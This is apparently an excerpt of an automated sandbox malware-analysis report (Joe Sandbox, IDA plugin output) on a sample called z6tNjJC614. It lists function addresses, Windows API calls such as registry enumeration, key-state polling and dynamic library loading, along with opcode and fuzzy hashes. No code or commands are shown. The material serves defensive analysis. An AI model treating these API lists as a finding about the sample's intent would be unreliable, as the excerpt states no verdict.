                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandle$FilePipe
                                                                      • String ID: nul
                                                                      • API String ID: 4209266947-2873401336
                                                                      • Opcode ID: 66d69e02bfc55e32f6e1efc360f3f31ce308ac3ee4676c2bb53de7971b22bbf7
                                                                      • Instruction ID: a13c1890bc5d606cc062b95c9fa4a76970e21108d3c583c2afdc44092003a855
                                                                      • Opcode Fuzzy Hash: 66d69e02bfc55e32f6e1efc360f3f31ce308ac3ee4676c2bb53de7971b22bbf7
                                                                      • Instruction Fuzzy Hash: F32195795007059BDF209F69EC08A5B7BACFF55720F208A1AFCA4D72D0D7709851E761
                                                                      Function 0057AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0057AC54
                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0057ACA8
                                                                      • __swprintf.LIBCMT ref: 0057ACC1
                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0059F910), ref: 0057ACFF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                      • String ID: %lu
                                                                      • API String ID: 3164766367-685833217
                                                                      • Opcode ID: 6399432a886178bfa1f0f015ad9736e0c10c967c00675705a391d8e09de4bdc0
                                                                      • Instruction ID: 559ae5c0d6343074eac86a66ff3617d2f985752594d0ba2121fcf543938cab74
                                                                      • Opcode Fuzzy Hash: 6399432a886178bfa1f0f015ad9736e0c10c967c00675705a391d8e09de4bdc0
                                                                      • Instruction Fuzzy Hash: 2E217130A0010AEFCB10DF64D949DEE7BB8FF89314B104069F909DB251DA31EE45DB61
                                                                      Function 00571142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0056FCED,?,00570D40,?,00008000), ref: 0057115F
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0056FCED,?,00570D40,?,00008000), ref: 00571184
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0056FCED,?,00570D40,?,00008000), ref: 0057118E
                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,0056FCED,?,00570D40,?,00008000), ref: 005711C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID: @W
                                                                      • API String ID: 2875609808-3480940232
                                                                      • Opcode ID: 8fe3751f3345e7fe24f063533233290b754544f130e9409b13b8c0a85cc3b546
                                                                      • Instruction ID: c765582024b401a08325e1e21abd561ae2788bcfcdd8467b8da12e68206c333b
                                                                      • Opcode Fuzzy Hash: 8fe3751f3345e7fe24f063533233290b754544f130e9409b13b8c0a85cc3b546
                                                                      • Instruction Fuzzy Hash: 7A113C31D00A1DDBCF009FA9E848AEEBF78FF19711F418456EA49BA240CB709554EBD9
                                                                      Function 00571AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00571B19
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 3964851224-769500911
                                                                      • Opcode ID: 7bbe43a7fcacf72420e0534436aa9ca134da2fe6f54c91fc269313f229f13fe9
                                                                      • Instruction ID: 29ce76fc4ea19ad3a53cdd4c468aca8038acfe272274c49a24f1e860222a5139
                                                                      • Opcode Fuzzy Hash: 7bbe43a7fcacf72420e0534436aa9ca134da2fe6f54c91fc269313f229f13fe9
                                                                      • Instruction Fuzzy Hash: A81161319002099FCF00EFA8E8659FEBBB4FF65304F1494A9D859A7291EB325D06DB54
                                                                      Function 0058EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0058EC07
                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0058EC37
                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0058ED6A
                                                                      • CloseHandle.KERNEL32(?), ref: 0058EDEB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                      • String ID:
                                                                      • API String ID: 2364364464-0
                                                                      • Opcode ID: ca06caef190b324a092a9920712a17b44c2259151603f668dbd5da8d40d1e3a0
                                                                      • Instruction ID: a20fff89c24f1275556e4a8334d0fe2c2e6f808268d0392ef54de238b9d0b7ea
                                                                      • Opcode Fuzzy Hash: ca06caef190b324a092a9920712a17b44c2259151603f668dbd5da8d40d1e3a0
                                                                      • Instruction Fuzzy Hash: D6818171604301AFE720EF28D85AF6ABBE5BF84710F14881DF999DB292D670AC45CB91
                                                                      Function 0053541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1559183368-0
                                                                      • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                      • Instruction ID: a7485802fd048a5d82645c86cc1eb620d1541b63f94d328d13ceb4218d80c990
                                                                      • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                      • Instruction Fuzzy Hash: 9751A870A00B05DBDF298FA9D84466E7FB6BF40321F249B29F825962D1F771ED508B40
                                                                      Function 00590037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                        • Part of subcall function 00590E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0058FDAD,?,?), ref: 00590E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005900FD
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059013C
                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00590183
                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 005901AF
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 005901BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                      • String ID:
                                                                      • API String ID: 3440857362-0
                                                                      • Opcode ID: 4356fac73f1a18b5df117770d4f7615e290341e4013d462d3eb71da3b12e3651
                                                                      • Instruction ID: ba382c66b62ec7a0dce52206ecf51495c0e3d6eada9b1f12b5d8eec0265916de
                                                                      • Opcode Fuzzy Hash: 4356fac73f1a18b5df117770d4f7615e290341e4013d462d3eb71da3b12e3651
                                                                      • Instruction Fuzzy Hash: 65514D71208205AFDB14EF58CC85EAEBBE9FF84314F40492DF596872A2DB31E944DB52
                                                                      Function 0058D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0058D927
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0058D9AA
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0058D9C6
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0058DA07
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0058DA21
                                                                        • Part of subcall function 00515A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577896,?,?,00000000), ref: 00515A2C
                                                                        • Part of subcall function 00515A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577896,?,?,00000000,?,?), ref: 00515A50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 327935632-0
                                                                      • Opcode ID: 5275ddb65c50bcb9effb5bcaf87b2ddf677b381787be80e9514350588597498e
                                                                      • Instruction ID: 09a05e0c6bdc051428c7e27dfc6afaaac87a79374e979fcfc5a7a598fe0fd7cf
                                                                      • Opcode Fuzzy Hash: 5275ddb65c50bcb9effb5bcaf87b2ddf677b381787be80e9514350588597498e
                                                                      • Instruction Fuzzy Hash: ED512735A0420ADFDB04EFA8C4889ADBBF4FF58310B148065E855AB352DB31ED85CB91
                                                                      Function 0057E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0057E61F
                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0057E648
                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0057E687
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0057E6AC
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0057E6B4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 1389676194-0
                                                                      • Opcode ID: a7452189bf4e15c3a9830c66cd606f3816fad426ede2f5ace50e0735560870b1
                                                                      • Instruction ID: a89b48aaf9b99fd245bd26193d7e22be0b59851063ceac4f05f0ae48b20ca728
                                                                      • Opcode Fuzzy Hash: a7452189bf4e15c3a9830c66cd606f3816fad426ede2f5ace50e0735560870b1
                                                                      • Instruction Fuzzy Hash: 3F510935A00206EFDB01EF64D995AADBBF5FF49314B1480A9E809AB361CB31ED51DB50
                                                                      Function 0059A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: adbfcb1bc44a43f26196b4739ba6455d75be0023e63195d7f42318b03d35a250
                                                                      • Instruction ID: f74acb53d36bb88d3d68d656385ca94f41fac5ababbe6ad0a78ea72b511c74f6
                                                                      • Opcode Fuzzy Hash: adbfcb1bc44a43f26196b4739ba6455d75be0023e63195d7f42318b03d35a250
                                                                      • Instruction Fuzzy Hash: 6F41A135905214AFDF20DF28DC48FA9BFA8FB09310F250566F816A72E1D730AD45FAA1
                                                                      Function 00512344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00512357
                                                                      • ScreenToClient.USER32(005D57B0,?), ref: 00512374
                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00512399
                                                                      • GetAsyncKeyState.USER32(00000002), ref: 005123A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID:
                                                                      • API String ID: 4210589936-0
                                                                      • Opcode ID: ed785b49c773f5f04c29ecf27874a56c9add9130454e4c7a26597122cca94b1e
                                                                      • Instruction ID: 2f64f218de6b0cdaf0eabd0b1755f0a8e69b78c9b493c6224b22f85e627f61cd
                                                                      • Opcode Fuzzy Hash: ed785b49c773f5f04c29ecf27874a56c9add9130454e4c7a26597122cca94b1e
                                                                      • Instruction Fuzzy Hash: C2417135604109FFDF199F68C848AEDBF74FB45364F20471AF839922A0D73499A4EBA1
                                                                      Function 005663AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005663E7
                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00566433
                                                                      • TranslateMessage.USER32(?), ref: 0056645C
                                                                      • DispatchMessageW.USER32(?), ref: 00566466
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00566475
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                      • String ID:
                                                                      • API String ID: 2108273632-0
                                                                      • Opcode ID: 00c5d1ef40eaf29e1608d8e97f65a80531c25414dc0ba7c2b5ececb95f4b77bd
                                                                      • Instruction ID: 683cbf6a740b75c8cea15e519ed1858567c9979181c5321277329bc2bb66ade8
                                                                      • Opcode Fuzzy Hash: 00c5d1ef40eaf29e1608d8e97f65a80531c25414dc0ba7c2b5ececb95f4b77bd
                                                                      • Instruction Fuzzy Hash: 3031A331A01646AFDF64CFB4DC84BB67FA8FB11341F240567E425C31A1EB25988DE761
                                                                      Function 00568A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00568A30
                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00568ADA
                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00568AE2
                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00568AF0
                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00568AF8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      • Opcode ID: 85373b68dc222789fd1030f163c884cfb92b8ba2e35abbb1831d3622bdd89fe1
                                                                      • Instruction ID: d8cbb584d1ffaf9178591c09ce94e7c5dd078ca49699190bd79dd65a24c52a44
                                                                      • Opcode Fuzzy Hash: 85373b68dc222789fd1030f163c884cfb92b8ba2e35abbb1831d3622bdd89fe1
                                                                      • Instruction Fuzzy Hash: E431BC71500219EBDF14CFA8D94CAAE3BB5FB14325F10822AF925EB2D0CBB09954DB90
                                                                      Function 0056B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 0056B204
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0056B221
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0056B259
                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0056B27F
                                                                      • _wcsstr.LIBCMT ref: 0056B289
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                      • String ID:
                                                                      • API String ID: 3902887630-0
                                                                      • Opcode ID: 36b925fa203deaa03e4ae975dc185e6effd025384f310f815ce75d43eb1a70b3
                                                                      • Instruction ID: b5478cfe72752a05ddcbeddec9a2460bc61a7b3f7a4f9c71c21dee6cde8d6691
                                                                      • Opcode Fuzzy Hash: 36b925fa203deaa03e4ae975dc185e6effd025384f310f815ce75d43eb1a70b3
                                                                      • Instruction Fuzzy Hash: 8921D3762042017AFB155B75DC59A7F7FECEB89710F00412AF805DA1A1EF619C80A360
                                                                      Function 0059B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0059B192
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0059B1B7
                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0059B1CF
                                                                      • GetSystemMetrics.USER32(00000004), ref: 0059B1F8
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00580E90,00000000), ref: 0059B216
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$MetricsSystem
                                                                      • String ID:
                                                                      • API String ID: 2294984445-0
                                                                      • Opcode ID: 93c37e356cae017e758a5c2917c6874ba190527cb91f190e3098ea5b5a6f4943
                                                                      • Instruction ID: d4bd65e6781b4876db75d7df6ef708207678f642c8d7eeea44f87a3cc1599ff5
                                                                      • Opcode Fuzzy Hash: 93c37e356cae017e758a5c2917c6874ba190527cb91f190e3098ea5b5a6f4943
                                                                      • Instruction Fuzzy Hash: 4B219471611655AFEF209F38ED44A6A3FA4FB15361F254725F932D71E0E7309810EB90
                                                                      Function 00569307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00569320
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00569352
                                                                      • __itow.LIBCMT ref: 0056936A
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00569392
                                                                      • __itow.LIBCMT ref: 005693A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
